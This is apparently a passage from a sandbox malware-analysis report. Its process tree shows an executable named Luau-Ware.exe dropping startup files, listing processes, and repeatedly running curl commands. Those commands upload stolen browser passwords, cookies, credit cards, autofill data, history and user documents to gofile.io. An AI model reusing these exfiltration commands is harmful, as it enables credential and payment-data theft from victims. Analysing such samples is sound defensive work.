      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4012
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4920
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5808
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5964
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4380
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile
      4⤵
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5288
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile
      4⤵
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4720
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1092
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile
      4⤵
      PID:1392

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:5500
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:2220
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4544
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:6064
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5280
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:3660
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5748
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:3200
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1236
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile
      4⤵
      PID:4900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4728
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile
      4⤵
      PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1600
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile
      4⤵
      PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile"
    3⤵
    PID:6104
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile
      4⤵
      PID:1580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4956
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\setup.dll
  2⤵
  - Modifies Internet Explorer Phishing Filter
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:5028
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5028 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:5132

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5128

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\README.txt
1⤵
PID:5064

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe" C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\README.txt
1⤵
- Executes dropped EXE
PID:6060
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe" C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\README.txt
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:5992
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5284
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1140
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5204
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5264
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:6040
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1128
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5856
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile
      4⤵
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5768
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile
      4⤵
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile"
    3⤵
    PID:6044
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile
      4⤵
      PID:5648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile"
    3⤵
    PID:3940
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile
      4⤵
      PID:4464

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:4140
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:1600
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:740
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:5552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5024
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:3580
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:1380
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:1384
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:944
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:6096
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store9.gofile.io/uploadFile
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store9.gofile.io/uploadFile"
    3⤵
    PID:4688
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store9.gofile.io/uploadFile
      4⤵
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store9.gofile.io/uploadFile"
    3⤵
    PID:1376
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store9.gofile.io/uploadFile
      4⤵
      PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5340
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store9.gofile.io/uploadFile
      4⤵
      PID:1600

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:5244
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:1472
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2164
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2760
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5160
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5296
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5412
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5528
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5204
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5408
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store4.gofile.io/uploadFile
      4⤵
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2536
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store4.gofile.io/uploadFile
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5252
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ReadBackup.ppsm" https://store4.gofile.io/uploadFile
      4⤵
      PID:3632

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5972

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:5308
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:3688
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:2032
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:5164
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:4664
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:5200
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:4920
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:2016
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile
      4⤵
      PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store8.gofile.io/uploadFile"
    3⤵
    PID:5220
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/BackupDismount.xltx" https://store8.gofile.io/uploadFile
      4⤵
      PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store8.gofile.io/uploadFile"
    3⤵
    PID:1628
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupResize.xlt" https://store8.gofile.io/uploadFile
      4⤵
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store8.gofile.io/uploadFile"
    3⤵
    PID:4728
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Documents/ImportBackup.vsd" https://store8.gofile.io/uploadFile
      4⤵
      PID:5920

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:3376
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:5352
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4436
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5284
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:3696
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5396
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:5832
- - C:\Windows\system32\cmd.exe
